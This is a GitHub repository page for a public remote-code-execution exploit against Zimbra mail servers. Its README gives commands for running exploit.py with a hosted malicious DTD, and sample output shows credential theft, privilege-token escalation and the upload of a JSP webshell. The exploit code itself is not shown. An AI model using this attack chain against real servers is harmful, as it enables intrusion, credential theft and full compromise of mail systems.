Skip to content
/ Zimbra-RCE-exploit Public

RCE exploit for attack chain in "A Saga of Code Executions on Zimbra" post

33 stars 6 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

nth347/Zimbra-RCE-exploit

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

6 Commits

.idea

.idea

 
 

README.md

README.md

 
 

exploit.py

exploit.py

 
 

malicious_dtd

malicious_dtd

 
 

shell.jsp

shell.jsp

 
 

Repository files navigation

Zimbra-RCE-exploit

RCE exploit for attack chain in "A Saga of Code Executions on Zimbra" post. Tested with Zimbra 8.6.0, 8.7.11

Usage:

$ git clone https://github.com/nth347/Zimbra-RCE-exploit.git
$ cd Zimbra-RCE-exploit/
$ # Edit "Target configuration" part, host the "malicious_dtd" file on a webserver
$ chmod +x exploit.py
$ ./exploit.py

Example:

$ ./exploit.py                   
[i] Getting Zimbra credentials
[+] Got credentials: zimbra:XXXXXX

[i] Getting low-privilege token
[+] Got low-privilege token: XXXXX

[i] Getting high-privilege token
[+] Got high-privilege token: XXXXX

[i] Uploading webshell
[+] Uploaded webshell. Location https://mail.test.com/downloads/shell.jsp

webshell@target$ id
uid=999(zimbra) gid=999(zimbra) groups=999(zimbra),0(root)
webshell@target$

Reference:

About

RCE exploit for attack chain in "A Saga of Code Executions on Zimbra" post

Topics

security exploit zimbra

Resources

Readme
Activity

Stars

33 stars

Watchers

3 watching

Forks

6 forks
Report repository

Releases

No releases published

Packages

No packages published

Contributors 2

Languages